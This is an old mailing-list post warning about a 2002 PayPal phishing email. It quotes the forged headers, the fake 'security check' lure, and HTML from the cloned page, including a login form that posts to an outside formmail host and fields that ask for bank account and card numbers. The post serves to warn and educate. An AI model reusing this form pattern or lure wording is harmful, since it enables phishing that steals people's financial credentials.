[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

SCAM WARNING: Paypal Security Check ! Please login !



It's probably time to once again remind our loved ones and customers to be 
careful. There are lots of people out there looking to part you from your 
money. And there's not a lot that John Ashcroft can do to these theives in 
Romania and http://www.thisismypage.com (where the form target was hosted) to 
get your money back.

And for all those that love HTML email ....

> Return-Path: <Services@paypal.com>
> From: Services@paypal.com
> X-ClientAddr: 216.136.171.252
> Received: from cable-z1-host-90.geniusnet.ro ([194.102.239.90]
>   helo=localhost.com)
> Date: Mon, 21 Oct 2002 00:22:09 +0200
> Subject: Paypal Security Check ! Please login !
> X-Mailer: MailXSender 1.02

Containing an HTML email with the following identifiers:
<!-- 
  Script info: Script: WEBSCR, Cmd: _registration-run, Template: p/gen/signup, 
Version: 14.5-168, Templates: 14.5-186, Date: Mon Oct  7 12:49:35 2002 
--> 

However, it curiously had the following target for the login form...

<FORM method=POST action="http://www.thisismypage.com/formmail.asp?user=onur" 
name="login_form">

And *NOT* PayPal's. Everything else about the page was ripped directly from 
PayPal's website - images and all.

And then, the clue phone rang when I read this...

> We are currently performing regular maintenance of our security measures.
> Your account has been randomly selected for this maintenance, and you will
> now be taken through a series of identity verification pages. 
>
> Protecting the security of your PayPal account is our primary concern, and
>  we apologize for any inconvenience this may cause. 
>
> Please confirm your account ownership by entering the information below.

Followed by this:

> Bank Account
> Select Bank Account:
> <select id="ach_id" name="ach_id"> 
> <OPTION VALUE="C5053327A0C9F5621DF2B49C271088678F3BEC07C07CDA9F" >Checking 
XXXXXXXXXX</OPTION>
> </SELECT> 
> Enter Bank Account #:
> <input type="text" name="ach_num" size="30" value="">

> OR Credit Card
> Select Credit Card:
> <SELECT name="cc_id" id="cc_id">                        
> <OPTION value="0232CA58518F16DE8A1ABFD302921E9CAD70CFACAAA65813" >Credit 
Card XXXX-XXXX-XXXX-XXXX</OPTION>
> </SELECT> 
> Enter Credit Card #:
> <input type="text" name="cc_num" size="30" maxlength="19" value="">

Mike808/
-- 
sed '/^[when][coders]/!d
        /^...[discover].$/d
       /^..[real].[code]$/!d
    ' /usr/share/dict/words

-
To unsubscribe, send email to majordomo@silug.org with
"unsubscribe silug-discuss" in the body.